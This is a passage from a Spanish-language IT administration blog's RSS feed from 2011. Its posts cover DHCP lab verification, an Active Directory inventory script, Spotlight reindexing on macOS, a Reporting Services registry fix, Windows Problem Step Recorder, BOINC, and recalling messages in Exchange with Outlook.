src="http://3.bp.blogspot.com/-aOx_i7xDNQs/Tno42hTIv5I/AAAAAAAAA1A/fBLg3VbTXjY/s400/14b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Activación del ámbito RangoDHCP</i></td></tr></tbody></table>Una vez completada la configuración ha llegado el momento de verificar el funcionamiento del servidor DHCP mediante el equipo WS1. Una vez encendido el equipo verificamos el direccionamiento IP que ha obtenido mediante una petición DHCP y podemos comprobar que tiene la IP 192.168.36.128 que se encuentra dentro del rango definido en el ámbito <i>RangoDHCP</i> del servidor SRV1.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-UWxCIBszWQw/Tno5yWBbeFI/AAAAAAAAA1E/A5Big-7hscc/s1600/16.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="http://4.bp.blogspot.com/-UWxCIBszWQw/Tno5yWBbeFI/AAAAAAAAA1E/A5Big-7hscc/s400/16.jpg" width="338" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Detalles de la conexión de red de WS1</i></td></tr></tbody></table>En el servidor SRV1 podemos comprobar las estadísticas del servidor DHCP habilitado mediante el siguiente comando:<br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">netsh dhcp server 192.168.36.40 show mibinfo</span></div><div style="text-align: center;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-QOkaM_ZP6L4/Tno6i6tlJPI/AAAAAAAAA1I/9r5DOnV85lc/s1600/15b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="196" src="http://2.bp.blogspot.com/-QOkaM_ZP6L4/Tno6i6tlJPI/AAAAAAAAA1I/9r5DOnV85lc/s400/15b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Estadísticas del servidor DHCP SRV1</i></td></tr></tbody></table>Con esto finaliza la primera entrega del tutorial de este laboratorio relacionado con ámbitos divididos del servidor DHCP de <i>Windows Server 2008 R2</i>.</div></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Obtener información de un bosque de Directorio Activo</title>
      <link>https://www.igalvan.es/posts/obtener-informacion-de-un-bosque-de_8495/</link>
      <pubDate>Sat, 17 Sep 2011 09:32:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/obtener-informacion-de-un-bosque-de_8495/</guid>
      <description><![CDATA[<p>Os dejo el enlace a un script creado por <a href="http://urpiano.wordpress.com/" target="_blank">Fernando Reyes (Urpiano)</a> que permite obtener de forma separada en ficheros de texto información acerca de un bosque de Directorio Activo.<br /><a href="https://www.blogger.com/null" name="more"></a>En concreto, obtiene la siguiente información:<br /><ul><li>Dominios</li><li>Sitios</li><li>Controladores de dominio</li><li>Unidades organizativas</li><li>Buzones de correo Exchange</li><li>Contactos</li><li>Listas de distribución</li><li>Equipos</li><li>Usuarios</li></ul><a href="http://urpiano.wordpress.com/2011/04/28/script-vbscript-para-obtener-informacion-de-un-bosque-de-active-directory-2/" target="_blank">Enlace al script de información de Directorio Activo</a><br /><br />Disfrutadlo y hasta el próximo artículo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Reindexar Spotlight en MacOS</title>
      <link>https://www.igalvan.es/posts/reindexar-spotlight-en-macos_5266/</link>
      <pubDate>Sat, 27 Aug 2011 12:56:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/reindexar-spotlight-en-macos_5266/</guid>
      <description><![CDATA[<p>La pasada semana me vi obligado a sustituir mi actual disco duro por otro de mayor capacidad y fue en ese momento cuando le di gracias a Dios por tener un <i>Macbook</i>. Los pasos son muy sencillos:<br /><a name='more'></a><br /><ol><li>Copiar todo el contenido del disco antiguo al nuevo mediante la herramienta<i> <a href="http://www.bombich.com/" target="_blank">Carbon Copy Cloner</a></i>.</li><br /> <li>Sustituir un disco por el otro. </li><br /> </ol>Y con esto finalizado el trabajo, o eso creía yo, porque había algo que no funcionaba y ese no era otro que <i>Spotlight</i> que no era capaz de encontrar casi ningún fichero ni aplicación. La solución, reindexar el contenido completo del disco duro y la forma de hacerlo es tan sencillo como ejecutar el siguiente comando desde una consola de <i>Terminal</i>:<br /><br /><div style="text-align: center;"><b><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">mdutil -E /</span></b></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-0Ch5-tMifmE/TljbEPy-xTI/AAAAAAAAAzE/nJQmVonD4Yk/s1600/terminal.jpg.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="76" src="http://2.bp.blogspot.com/-0Ch5-tMifmE/TljbEPy-xTI/AAAAAAAAAzE/nJQmVonD4Yk/s400/terminal.jpg.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Ejecución del comando desde <i>Terminal</i></td></tr><br /> </tbody></table><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-2EO5AhSURUE/TljaGbBNrII/AAAAAAAAAy8/ZrQZzgdwz0E/s1600/spotlight.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="191" src="http://3.bp.blogspot.com/-2EO5AhSURUE/TljaGbBNrII/AAAAAAAAAy8/ZrQZzgdwz0E/s400/spotlight.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Reindexado de <i>Spotlight</i> en funcionamiento</td></tr><br /> </tbody></table><div><br /></div><br /><br /><br /></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Reporting Services 2008 no arranca después de actualizar a R2</title>
      <link>https://www.igalvan.es/posts/reporting-services-2008-no-arranca_5311/</link>
      <pubDate>Wed, 17 Aug 2011 21:19:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/reporting-services-2008-no-arranca_5311/</guid>
      <description><![CDATA[<p>Me encontraba yo aburrido y me dio por actualizar una instancia de <i>SQL Server 2008</i>, que utilizo en una maqueta para un curso, a <i>SQL Server 2008 R2</i>. En principio todo fue correctamente hasta que probé a arrancar el <i>Reporting Services</i> y me encontré con el error mostrado en la figura siguiente.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-sZEr3N0q104/TkwfRZdmlAI/AAAAAAAAAys/R0vQ8Tjw36U/s1600/7.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="326" src="http://4.bp.blogspot.com/-sZEr3N0q104/TkwfRZdmlAI/AAAAAAAAAys/R0vQ8Tjw36U/s400/7.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Error al arrancar <i>Reporting Services</i></td></tr><br /> </tbody></table><br /><a name='more'></a>El primer paso fue revisar el visor de eventos donde me encontré con los eventos 113, 140 de «Report Server Windows Service (MSSQLSERVER)» y 0 de «SQL Server Reporting Services (MSSQLSERVER)» que son bastante poco indicativos de cuál era el problema que estaba impidiendo arrancar el servicio con normalidad.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-l-uugSaNjf4/Tkwe5ddySjI/AAAAAAAAAyo/zoIkf067jD0/s1600/8.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="398" src="http://2.bp.blogspot.com/-l-uugSaNjf4/Tkwe5ddySjI/AAAAAAAAAyo/zoIkf067jD0/s400/8.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Eventos de Aplicación 113, 140 y 0</td></tr><br /> </tbody></table>El siguiente paso fue revisar el log de errores de <i>Reporting Services</i> filtrando los mensajes de error y me encontré el siguiente mensaje de error «ERROR: Error creating counter.  Category: MSRS 2008 R2 Windows Service, Counter: Report Requests, Instance: MSSQLSERVER.  Error Description: System.InvalidOperationException: El contador de rendimiento solicitado no es un contador personalizado, se debe inicializar como ReadOnly».<br /><br />Tras un ratito maldiciendo mi ocurrencia de actualizar algo que estaba funcionando y de paso buscando por <i>Google</i> (que diferente sería nuestra vida sin <i>Internet</i>) he encontrado el <a href="http://support.microsoft.com/kb/956155/en-us" target="_blank">KB956155</a> de <i>Microsoft</i> donde habla de un problema al eliminar la versión de 32 bits de <i>SQL Server 2008</i> que hace que se borren varias claves del «Registro de <i>Windows</i> siendo una de ellas la que indica el error que aparecía en mi fichero de <i>log</i>.<br /><br />Aunque no se trata del mismo error decido crear las cuatro claves de registro según indica el «Método 2» del KB. Resumiendo, se trata de crear las siguiente claves de tipo multi-cadena (REG_MULTI_SZ) sin ningún valor:<br /><ul><li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Web Service\Performance:Counter Names</li><br /> <li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Web Service\Performance:Counter Types</li><br /> <li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Windows Service\Performance:Counter Names</li><br /> <li>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSRS 2008 Windows Service\Performance:Counter Types</li><br /> </ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-_MHf7AerZx8/Tkwdv1Kkh_I/AAAAAAAAAyk/vFol6UKnQWA/s1600/9.jpg.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="277" src="http://1.bp.blogspot.com/-_MHf7AerZx8/Tkwdv1Kkh_I/AAAAAAAAAyk/vFol6UKnQWA/s400/9.jpg.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Claves de registro generadas</td></tr><br /> </tbody></table>Por último solo quedaba arrancar el servicio y comprobar que ya se encontraba operativo nuevamente tal y como se muestra en esta última figura.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-l5vG9EqGv68/TkwdS3Zkc2I/AAAAAAAAAyg/6HeV1Q5kODc/s1600/10.jpg.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="211" src="http://1.bp.blogspot.com/-l5vG9EqGv68/TkwdS3Zkc2I/AAAAAAAAAyg/6HeV1Q5kODc/s400/10.jpg.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Inicio normal de<i> Reporting Services</i></td></tr><br /> </tbody></table>Con esto me despido hasta el próximo artículo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Problem Step Recorder (PSR) en Windows 7 y Windows 2008 Server</title>
      <link>https://www.igalvan.es/posts/problem-step-recorder-psr-en-windows-7_3807/</link>
      <pubDate>Fri, 12 Aug 2011 18:13:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/problem-step-recorder-psr-en-windows-7_3807/</guid>
      <description><![CDATA[<p>Hoy voy a hablar de una nueva herramienta que está disponible en <i>Windows</i> <i>7</i> y <i>Windows 2008 Server</i> que permite grabar todas las acciones que se realizan directamente sobre el equipo, su nombre es «Problem Step Recorder» (PSR).<br /><br />Realmente esta herramienta fue pensada para que los técnicos de soporte pudieran ver «en vivo» los problemas y acciones que realizan los usuarios de una forma gráfica, pero a mi me sirve para realizar la documentación de los distintos procesos de una forma rápida para posteriormente subirlos a mi base de datos del conocimiento privada.<br /><a name='more'></a><br />La utilidad se ejecuta desde una ventana de «Símbolo de sistema» mediante el comando «psr» (sin las comillas) tal y como se muestra en la figura siguiente:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-5XUQKzyf3wk/TkVYixox9nI/AAAAAAAAAyI/JekfJll-d8M/s1600/imagen1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="297" src="http://3.bp.blogspot.com/-5XUQKzyf3wk/TkVYixox9nI/AAAAAAAAAyI/JekfJll-d8M/s400/imagen1.png" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Ejecución de la herramienta PSR</td></tr><br /> </tbody></table>Si se desea capturar alguna ventana que se esté ejecutando como «Administrador» es necesario ejecutar la herramienta con privilegios de Administrador».<br /><br />La herramienta tiene una ventana de configuración que se accede desde la opción de «Configuración&hellip;» dentro del menú de ayuda tal y como se muestra en la figura siguiente:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-oE2R83E8H8A/TkVYvBjhggI/AAAAAAAAAyM/ew3OEOUcwP0/s1600/imagen2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="http://4.bp.blogspot.com/-oE2R83E8H8A/TkVYvBjhggI/AAAAAAAAAyM/ew3OEOUcwP0/s400/imagen2.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Acceso a la configuración</td></tr><br /> </tbody></table>Dentro del apartado de configuración es posible configurar la ruta de destino de la captura, si se desea realizar la captura de la pantalla y el número de capturas de pantalla a realizar tal y como se muestra en la figura siguiente:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><br /> <tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-i0LbmogGM7w/TkVY48CICtI/AAAAAAAAAyQ/KsjboNNiscs/s1600/imagen3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="241" src="http://3.bp.blogspot.com/-i0LbmogGM7w/TkVY48CICtI/AAAAAAAAAyQ/KsjboNNiscs/s400/imagen3.jpg" width="400" /></a></td></tr><br /> <tr><td class="tr-caption" style="text-align: center;">Dialogo de configuración</td></tr><br /> </tbody></table>Por último, he realizado una captura de ejemplo con comentarios que he subido al siguiente <a href="http://dl.dropbox.com/u/38036009/prueba_psr.zip">enlace</a> y os puede servir de muestra de las capacidades de esta herramienta.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>BOINC, computación distribuida solidaria</title>
      <link>https://www.igalvan.es/posts/boinc-computacion-distribuida-solidaria_9927/</link>
      <pubDate>Sun, 07 Aug 2011 18:32:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/boinc-computacion-distribuida-solidaria_9927/</guid>
      <description><![CDATA[<p>Muchos de nosotros tenemos un ordenador en nuestras casas que usamos como servidor de ficheros o, como en mi caso, para descargar ficheros ISO (de software libre o adquirido legalmente, no vayáis a pensar mal). Estos equipos realmente hacen muy poco uso de la CPU ya que no se suelen usar de forma directa y habitual, entonces, ¿por qué no aprovechar esos ciclos muertos en algo provechoso para toda la humanidad?<br /><br /><a name='more'></a><br />Pues esto lo puedes hacer con BOINC, se trata de un software de computación distribuida creado por la Universidad de <i>Berkeley</i> (EE.UU.) que nos permite ayudar a investigaciones científicas en muchas áreas, incluyendo física, química, biología, medicina, matemáticas, astronomía, etc.<br /><br />Básicamente te instalas un cliente (con versiones para <i>Windows</i>, <i>Mac</i> y <i>Linux</i>), eliges los proyectos en los que quieres participar y listo. En mi caso está instalado en un equipo con un procesador VIA C7 a 1,5 GHz de un solo núcleo y no se nota ninguna sobrecarga porque el propio programa cuando detecta que existe actividad en el equipo para los cálculos y los continua cuando detecta que esta ha cesado.<br /><br />Os paso el <a href="http://boinc.berkeley.edu/" target="_blank">enlace de la web de BOINC</a> y sed solidarios, no os cuesta nada y quién sabe, quizás contribuyas a realizar algún descubrimiento primordial para la humanidad.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Invitaciones para Google Plus</title>
      <link>https://www.igalvan.es/posts/invitaciones-para-google-plus_7/</link>
      <pubDate>Sun, 07 Aug 2011 17:55:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/invitaciones-para-google-plus_7/</guid>
      <description><![CDATA[<p>Resulta que <i>Google</i> nos ha dado a los usuarios de <i>Google Plus</i> un paquete de 150 invitaciones y esta vez nos ha facilitado la vida permitiendo distribuirlas mediante un enlace. Para aquellos que quieran probarlo aquí les dejo el <a href="https://plus.google.com/_/notifications/ngemlink?path=%2F%3Fgpinv%3D9HNnLKn_TAs%3AvgxJW9ij0pY" target="_blank">enlace</a>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Recuperando mensajes en Exchange con Outlook ( y parte II)</title>
      <link>https://www.igalvan.es/posts/recuperando-mensajes-en-exchange-con_7161/</link>
      <pubDate>Wed, 03 Aug 2011 16:44:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/recuperando-mensajes-en-exchange-con_7161/</guid>
      <description><![CDATA[<p>Este artículo es la segunda parte de <a href="http://www.igalvit.es/2011/08/recuperando-mensajes-en-exchange-con.html">este otro</a>. Me quedó pendiente comentar los motivos por los que este servicio que proporciona <i>Exchange</i> no me gusta.<br /><br /><a name='more'></a><br />Realmente tan solo hay un motivo principal: en la mayor parte de los casos no funciona, es decir, el mensaje no es recuperado de la Bandeja de Entrada del receptor. Es más, en varias circunstancias se le remite al receptor un mensaje de notificación indicando que se ha tratado de recuperar el mencionado mensaje similar al mostrado en la siguiente figura.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-Ogf9ol6sf5A/TjlnVlDitaI/AAAAAAAAAAs/Df8XfF9h1hM/s1600/imagen+1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="135" src="http://1.bp.blogspot.com/-Ogf9ol6sf5A/TjlnVlDitaI/AAAAAAAAAAs/Df8XfF9h1hM/s400/imagen+1.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Notificación de intento de recuperación de mensaje</td></tr></tbody></table><br />¿No es esto peor que haberse equivocado al enviar el correo? No solo pone de manifiesto que existe un correo que no se quiere que el receptor lea, sino que encima posa la atención del mismo sobre este correo y por último muestra la intención de borrarlo de forma poco clara.<br /><br />En resumen, la recuperación de mensajes depende de las siguientes circunstancias:<br /><br /><ul><li>El cliente de correo que usa el receptor, basicamente si usa <i>Outlook</i>.</li><li>La configuración del cliente de correo del receptor, principalmente de la opción de «Procesar automáticamente convocatorias de reunión y respuestas a convocatorias de reunión y sondeos».</li><li>La lectura del correo enviado por parte del receptor. Si lo ha leído, no se puede recuperar el mensaje de correo.</li><li>La ubicación del receptor del correo, es decir, si pertenece a la organización de <i>Exchange</i> o es un usuario  externo.</li></ul><br />Un consejo, digan a los usuarios que antes de pulsar el botón «Enviar», se paren un segundo y realicen los siguientes tres pasos:<br /><br /><ol><li>Revisa las direcciones de correo en los campos «Para», «CC» y «CCO».</li><li>Revisa los ficheros adjuntos al correo electrónico.</li><li>Revisa el asunto y el cuerpo del correo y analiza su contenido.</li></ol></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Recuperando mensajes en Exchange con Outlook (parte I)</title>
      <link>https://www.igalvan.es/posts/recuperando-mensajes-en-exchange-con_3539/</link>
      <pubDate>Mon, 01 Aug 2011 17:36:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/recuperando-mensajes-en-exchange-con_3539/</guid>
      <description><![CDATA[<p>Hace algún tiempo un compañero de la empresa en la que trabajo me pregunto por esta funcionalidad que ofrece <i>Exchange</i>, así que he decidido crear una entrada en mi blog explicando su funcionamiento.<br />He decidido dividir el artículo en dos partes, en la primera voy a explicar el funcionamiento del servicio y en la segunda mis razones para no usarlo o al menos no publicarlo como un servicio de «borrado de errores» a los usuarios.<br /><br /><a name='more'></a><br />En mi caso voy a utilizar una maqueta basada en <i>Microsoft Windows 2008</i>, <i>Microsoft Exchange 2007</i> y <i>Microsoft Outlook 2010</i> en español instalados sobre la misma máquina virtual que también hace de controlador de dominio. Como apunte adicional, comentaros que esta funcionalidad se encuentra tambien disponible en las versiones de 2003/2007 <i>Microsoft Outlook</i> y en la versión 2010 de <i>Microsoft Exchange</i>.<br /><br />Voy a partir de la situación ficticia en la que existen dos usuarios de la misma organización de <i>Exchange</i>. El usuario «Usuario Enviador» con dirección de correo <i><a href="mailto:uenvia@averno.int">uenvia@averno.int</a></i> ha enviado un correo por error al usuario «Usuario Receptor» con dirección de correo <i><a href="mailto:urecibe@averno.int">urecibe@averno.int</a></i>. A «Usuario Enviador» no le interesa que «Usuario Receptor» vea el contenido de este correo por lo que quiere recuperarlo.<br /><br />El proceso es sencillo, en este caso «Usuario Enviador» se ha dado cuenta de su error y realiza los siguientes pasos desde <i>Outlook</i>:<br /><br /><ul><li>Busca el mensaje en su carpeta de «Mensajes Enviados».</li></ul><br /><ul></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-c3tZGdWXrN8/TjbFy4MGmeI/AAAAAAAAAAM/54ac-xnn0O8/s1600/imagen+1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="221" src="http://1.bp.blogspot.com/-c3tZGdWXrN8/TjbFy4MGmeI/AAAAAAAAAAM/54ac-xnn0O8/s400/imagen+1.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Buscando el correo erroneo en Elementos enviados.</td></tr></tbody></table><br /><ul><li>Abre el mensaje y en la cinta selecciona la pestaña «Archivo» tal y como se muestra en la figura siguiente:</li></ul><br /><ul></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-mCCK-TZ4vMw/TjbHM_hGdjI/AAAAAAAAAAQ/8sOKIbjNyqc/s1600/imagen+2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="116" src="http://3.bp.blogspot.com/-mCCK-TZ4vMw/TjbHM_hGdjI/AAAAAAAAAAQ/8sOKIbjNyqc/s400/imagen+2.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Pestaña «Archivo» dentro del mensaje enviado.</td></tr></tbody></table><br /><ul><li>En la categoría «Información» selecciona la opción «Recuperar este mensaje» dentro del botón «Volver a enviar o recuperar».</li></ul><br /><ul></ul><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-rRb5mSIheI4/TjbJE4egCfI/AAAAAAAAAAc/fywkadMEbWE/s1600/imagen+3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="305" src="http://1.bp.blogspot.com/-rRb5mSIheI4/TjbJE4egCfI/AAAAAAAAAAc/fywkadMEbWE/s400/imagen+3.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Localización de la opción «Recuperar este mensaje&hellip;».</td></tr></tbody></table><br /><ul><li>En la ventana de dialogo «Recuperar este mensaje» que se abre a continuación selecciona las opciones «Eliminar las copias no leídas de este mensaje» e «Informar del éxito de la recuperación para cada destinatario» y pulsa el botón de «Aceptar».</li></ul><br /><ul></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-5j-EjmmrbEk/TjbIUVBAsPI/AAAAAAAAAAY/ME8Yk8feG0c/s1600/imagen+4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="232" src="http://4.bp.blogspot.com/-5j-EjmmrbEk/TjbIUVBAsPI/AAAAAAAAAAY/ME8Yk8feG0c/s400/imagen+4.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Opciones de recuperación del mensaje.</td></tr></tbody></table><br />Ahora le toca rezar y esperar a que le llegue el mensaje de notificación de éxito o fallo según corresponda. ¿El motivo? De forma general se pueden plantear dos posible situaciones, la primera en la que «Usuario Receptor» no haya leído todavía el mensaje original, y la segunda en que si lo ha hecho.<br /><br />En el primer caso el mensaje se recuperará y «Usuario Enviador» recibirá un mensaje como el de la siguiente figura:<br /><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-4UHbCCaIwUQ/TjbLi-9aIwI/AAAAAAAAAAk/8r2NuheJUI0/s1600/imagen+6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="http://2.bp.blogspot.com/-4UHbCCaIwUQ/TjbLi-9aIwI/AAAAAAAAAAk/8r2NuheJUI0/s400/imagen+6.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Notificación de recuperación realizada.</td></tr></tbody></table><br />En el segundo caso, es decir, que «Usuario Receptor» haya leído el mensaje, <i>Exchange</i> no lo recuperará y el usuario «Usuario Enviador» recibirá un mensaje como el de la siguiente figura:<br /><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-7hmlTikCFcE/TjbKaCbjFQI/AAAAAAAAAAg/CokCqmuTsiY/s1600/imagen+5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="285" src="http://4.bp.blogspot.com/-7hmlTikCFcE/TjbKaCbjFQI/AAAAAAAAAAg/CokCqmuTsiY/s400/imagen+5.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Notificación de recuperación no realizada.</td></tr></tbody></table><br />Esta forma de verificar el resultado de la recuperación resulta útil cuando el número de receptores es muy pequeño, pero cuando se tratan de veinte o treinta no lo es. Otra forma de comprobar el resultado de la recuperación mucho más efectiva para estos casos es a través del botón «Seguimiento» que se puede localizar en la cinta del mensaje enviado según muestra la figura siguiente.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-K_yC8JJ-DK8/TjbPkSOldKI/AAAAAAAAAAo/0XP29vl7eus/s1600/imagen+7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="http://1.bp.blogspot.com/-K_yC8JJ-DK8/TjbPkSOldKI/AAAAAAAAAAo/0XP29vl7eus/s400/imagen+7.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Seguimiento del mensaje recuperado.</td></tr></tbody></table><br />Como se ve del ejemplo el funcionamiento del servicio es muy sencillo pero no todo es tan bonito como lo pintan, ahora viene la parte negativa. El funcionamiento del servicio depende muchísimo de que el receptor cumpla ciertos requisitos previos, para no complicarlo he extraído esta tabla de la documentación disponible de <a href="http://office.microsoft.com/es-es/"><i>Office.com</i></a> para explicar las distintas situaciones y condicionantes y sus resultados.<br /><br /><style type="text/css">    p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px}     p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; text-align: center; font: 12.0px Helvetica}     p.p3 {margin: 0.0px 0.0px 0.0px 0.0px; font: 10.0px Helvetica}     p.p4 {margin: 0.0px 0.0px 0.0px 0.0px; font: 10.0px Helvetica; min-height: 12.0px}     span.Apple-tab-span {white-space:pre}     table.t1 {border-collapse: collapse}     td.td1 {border-style: solid; border-width: 1.0px 1.0px 1.0px 1.0px; border-color: #cbcbcb #cbcbcb #cbcbcb #cbcbcb; padding: 0.0px 5.0px 0.0px 5.0px} td.td2 {border-style: solid; border-width: 1.0px 1.0px 1.0px 1.0px; border-color: #cbcbcb #cbcbcb #cbcbcb #cbcbcb; padding: 0.0px 5.0px 0.0px 5.0px; text-align: center} </style><br /><table cellpadding="0" cellspacing="0" class="t1"><tbody><tr>       <td class="td2" valign="middle"><b>SITUACIÓN</b></td>       <td class="td2" valign="middle"><b>RESULTADO</b></td></tr><tr><td class="td1" valign="middle"><br /><div class="p3">Envía un mensaje de correo electrónico a una persona. Recupera el mensaje original y lo sustituye por uno nuevo.</div><div class="p3">En el equipo del destinatario, en Opciones de seguimiento, la opción Procesar convocatorias y respuestas al recibirlas está activada.</div></td>       <td class="td1" valign="middle"><br /><div class="p3">Tanto el mensaje original como el mensaje de recuperación llegan a la Bandeja de entrada del destinatario.</div><div class="p3">Suponiendo que el mensaje original no se haya leído, éste se eliminará y al destinatario se le informará de que el remitente eliminó el 